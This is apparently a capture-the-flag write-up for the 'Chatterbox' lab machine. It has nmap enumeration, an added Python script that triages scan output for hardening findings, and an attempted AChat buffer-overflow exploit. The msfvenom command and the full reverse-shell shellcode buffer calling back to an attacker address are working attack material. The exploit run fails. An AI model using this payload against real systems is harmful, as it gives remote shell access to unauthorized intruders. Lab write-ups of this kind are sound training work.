
Chatterbox

Enumeration

$ nmap -A -T4 --min-rate 5000 -p- -n -Pn --open 10.10.10.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-13 12:57 CEST
Nmap scan report for 10.10.10.74
Host is up (0.040s latency).
Not shown: 64601 closed tcp ports (reset), 923 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  mon?
9256/tcp  open  unknown
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).


Network Distance: 2 hops
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-06-13T11:58:58-04:00
|_clock-skew: mean: 6h20m00s, deviation: 2h18m35s, median: 4h59m59s
| smb2-time: 
|   date: 2025-06-13T15:58:57
|_  start_date: 2025-06-13T00:27:44
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
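The scan above already carries the findings a defender would act on: an end-of-life OS string on 445/tcp, SMB1 message signing disabled and SMB2 signing optional, plus two unidentified services on non-standard ports. The following Python script is an added example, not part of the original writeup, that parses this plain-text nmap report format and turns those lines into a triage list. The embedded report is an excerpt of the scan output above; the end-of-life marker list is an assumption you would replace with your own asset inventory.

```python
"""Triage a plain-text `nmap -A` report for hardening findings.

Added example for this writeup: parse open ports and the host script
results, then flag an end-of-life OS, SMB signing that is disabled or
optional, and services nmap could not identify.
"""
import re
from dataclasses import dataclass, field

# Excerpt of the scan output above, embedded so the script runs offline.
SAMPLE_REPORT = """\
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  mon?
9256/tcp  open  unknown
Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
"""

# "445/tcp   open  microsoft-ds <version text>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# NSE script output lines start with "| " or "|_" followed by indentation.
SCRIPT_LINE_RE = re.compile(r"^\|[_ ]\s*(.*)$")

# Assumption: a short illustrative list of OS families that no longer receive
# security updates; extend it to match your own environment.
EOL_OS_MARKERS = ("Windows XP", "Windows 7", "Windows Server 2003", "Windows Server 2008")


@dataclass
class Finding:
    severity: str   # "high", "medium" or "info"
    title: str
    evidence: str   # the report line that produced the finding


@dataclass
class Report:
    open_ports: list = field(default_factory=list)   # (port, proto, service)
    findings: list = field(default_factory=list)


def parse_report(text: str) -> Report:
    """Walk the report line by line and collect open ports and findings."""
    report = Report()
    for raw in text.splitlines():
        line = raw.rstrip()

        m = PORT_RE.match(line)
        if m:
            port, proto, state, service = int(m[1]), m[2], m[3], m[4]
            if state != "open":
                continue
            report.open_ports.append((port, proto, service))
            # nmap marks guesses with a trailing "?" and unmatched banners as "unknown".
            if service.endswith("?") or service == "unknown":
                report.findings.append(Finding(
                    "info", f"Unidentified service on {port}/{proto}", line))
            continue

        m = SCRIPT_LINE_RE.match(line)
        if not m:
            continue
        body = m[1].strip()

        if body.startswith("OS: ") and any(mk in body for mk in EOL_OS_MARKERS):
            report.findings.append(Finding("high", "End-of-life operating system", body))
        elif body.startswith("message_signing:"):
            value = body.split(":", 1)[1].strip()
            if value.startswith("disabled"):
                report.findings.append(Finding("high", "SMB1 message signing disabled", body))
        elif body.lower().startswith("message signing enabled but not required"):
            report.findings.append(Finding("medium", "SMB2 message signing not required", body))
    return report


def summarize(report: Report) -> list:
    """Return findings sorted high -> medium -> info as printable strings."""
    order = {"high": 0, "medium": 1, "info": 2}
    ranked = sorted(report.findings, key=lambda f: order[f.severity])
    return [f"[{f.severity.upper()}] {f.title}: {f.evidence}" for f in ranked]


if __name__ == "__main__":
    result = parse_report(SAMPLE_REPORT)
    print("open ports:", [p for p, _, _ in result.open_ports])
    for entry in summarize(result):
        print(entry)
```

The mitigations follow directly from the finding titles: require SMB signing on both the SMB1 and SMB2 dialects (or disable SMB1 outright), retire the end-of-life host, and identify or firewall the services nmap could not fingerprint.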

Investigating the ports, we find that the program running on them is AChat. Using searchsploit, we take the first result, the remote buffer overflow (rbo).

Following the exploit's instructions, generate the payload with msfvenom:

$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.17 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3822 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x6b\x4c\x49\x58\x74\x42\x4b\x50"
buf += b"\x79\x70\x59\x70\x33\x30\x72\x69\x5a\x45\x70\x31"
buf += b"\x65\x70\x70\x64\x62\x6b\x50\x50\x70\x30\x42\x6b"
buf += b"\x6e\x72\x5a\x6c\x52\x6b\x52\x32\x4c\x54\x42\x6b"
buf += b"\x53\x42\x4f\x38\x4c\x4f\x44\x77\x70\x4a\x6e\x46"
buf += b"\x50\x31\x4b\x4f\x66\x4c\x4f\x4c\x53\x31\x71\x6c"
buf += b"\x4b\x52\x4e\x4c\x6d\x50\x66\x61\x56\x6f\x6a\x6d"
buf += b"\x6b\x51\x56\x67\x57\x72\x78\x72\x50\x52\x6f\x67"
buf += b"\x62\x6b\x72\x32\x7a\x70\x44\x4b\x4d\x7a\x4f\x4c"
buf += b"\x72\x6b\x6e\x6c\x5a\x71\x74\x38\x7a\x43\x4e\x68"
buf += b"\x4b\x51\x56\x71\x4f\x61\x32\x6b\x50\x59\x6b\x70"
buf += b"\x7a\x61\x68\x53\x72\x6b\x30\x49\x6a\x78\x78\x63"
buf += b"\x4e\x5a\x61\x39\x44\x4b\x6d\x64\x62\x6b\x6a\x61"
buf += b"\x68\x56\x6e\x51\x6b\x4f\x46\x4c\x57\x51\x46\x6f"
buf += b"\x6a\x6d\x4d\x31\x39\x37\x70\x38\x79\x50\x31\x65"
buf += b"\x68\x76\x79\x73\x31\x6d\x59\x68\x4f\x4b\x63\x4d"
buf += b"\x4f\x34\x62\x55\x48\x64\x6e\x78\x54\x4b\x51\x48"
buf += b"\x6c\x64\x6a\x61\x37\x63\x6f\x76\x34\x4b\x6c\x4c"
buf += b"\x4e\x6b\x62\x6b\x51\x48\x6b\x6c\x4b\x51\x49\x43"
buf += b"\x34\x4b\x4d\x34\x54\x4b\x4d\x31\x68\x50\x54\x49"
buf += b"\x71\x34\x6d\x54\x4c\x64\x4f\x6b\x31\x4b\x50\x61"
buf += b"\x50\x59\x70\x5a\x50\x51\x59\x6f\x6b\x30\x4f\x6f"
buf += b"\x6f\x6f\x61\x4a\x52\x6b\x5a\x72\x68\x6b\x44\x4d"
buf += b"\x31\x4d\x63\x38\x6c\x73\x4d\x62\x39\x70\x6d\x30"
buf += b"\x6f\x78\x63\x47\x52\x53\x4e\x52\x4f\x6f\x42\x34"
buf += b"\x42\x48\x6e\x6c\x50\x77\x4e\x46\x6c\x47\x39\x6f"
buf += b"\x5a\x35\x36\x58\x54\x50\x6d\x31\x39\x70\x6d\x30"
buf += b"\x6b\x79\x58\x44\x70\x54\x52\x30\x51\x58\x6b\x79"
buf += b"\x45\x30\x70\x6b\x6b\x50\x59\x6f\x49\x45\x70\x50"
buf += b"\x72\x30\x4e\x70\x4e\x70\x6f\x50\x30\x50\x4f\x50"
buf += b"\x30\x50\x73\x38\x57\x7a\x4a\x6f\x79\x4f\x39\x50"
buf += b"\x59\x6f\x5a\x35\x43\x67\x71\x5a\x4a\x65\x32\x48"
buf += b"\x79\x7a\x59\x7a\x5a\x6e\x4a\x71\x62\x48\x6c\x42"
buf += b"\x79\x70\x5a\x61\x45\x6b\x65\x39\x6a\x46\x72\x4a"
buf += b"\x5a\x70\x50\x56\x52\x37\x32\x48\x33\x69\x64\x65"
buf += b"\x33\x44\x6f\x71\x49\x6f\x48\x55\x45\x35\x57\x50"
buf += b"\x53\x44\x4a\x6c\x59\x6f\x30\x4e\x6a\x68\x62\x55"
buf += b"\x5a\x4c\x52\x48\x5a\x50\x47\x45\x56\x42\x72\x36"
buf += b"\x39\x6f\x59\x45\x62\x48\x62\x43\x30\x6d\x63\x34"
buf += b"\x6b\x50\x42\x69\x38\x63\x6e\x77\x4f\x67\x4f\x67"
buf += b"\x4d\x61\x5a\x56\x51\x5a\x6d\x42\x31\x49\x32\x36"
buf += b"\x47\x72\x6b\x4d\x63\x36\x37\x57\x4d\x74\x6c\x64"
buf += b"\x6d\x6c\x4a\x61\x6d\x31\x54\x4d\x61\x34\x4e\x44"
buf += b"\x6e\x30\x75\x76\x39\x70\x71\x34\x6f\x64\x30\x50"
buf += b"\x62\x36\x42\x36\x6e\x76\x6f\x56\x71\x46\x50\x4e"
buf += b"\x32\x36\x4e\x76\x72\x33\x42\x36\x53\x38\x31\x69"
buf += b"\x48\x4c\x6d\x6f\x71\x76\x4b\x4f\x78\x55\x71\x79"
buf += b"\x77\x70\x30\x4e\x62\x36\x51\x36\x79\x6f\x6e\x50"
buf += b"\x70\x68\x6d\x38\x51\x77\x6b\x6d\x63\x30\x49\x6f"
buf += b"\x66\x75\x55\x6b\x6c\x30\x44\x75\x56\x42\x50\x56"
buf += b"\x6f\x78\x36\x46\x52\x75\x47\x4d\x33\x6d\x59\x6f"
buf += b"\x79\x45\x4f\x4c\x79\x76\x43\x4c\x7a\x6a\x53\x50"
buf += b"\x6b\x4b\x77\x70\x73\x45\x6d\x35\x47\x4b\x31\x37"
buf += b"\x6e\x33\x31\x62\x62\x4f\x70\x6a\x6d\x30\x70\x53"

Then change the server address in the exploit script.

But the exploit won't work; the machine seems broken as of today.

$ python3 36025.py
---->{P00F}!

Bug

Machine out of service.